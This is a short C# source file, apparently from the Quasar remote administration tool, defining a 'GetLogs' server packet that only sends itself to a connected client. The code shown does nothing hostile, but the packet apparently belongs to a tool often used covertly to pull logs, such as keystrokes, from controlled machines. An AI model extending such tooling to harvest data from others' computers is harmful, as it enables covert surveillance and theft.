Quasar/Server/Core/Packets/ServerPackets/GetLogs.cs

15 lines
259 B
C#

using ProtoBuf;
namespace xServer.Core.Packets.ServerPackets
{
[ProtoContract]
public class GetLogs : IPacket
{
public GetLogs() { }
public void Execute(Client client)
{
client.Send(this);
}
}
}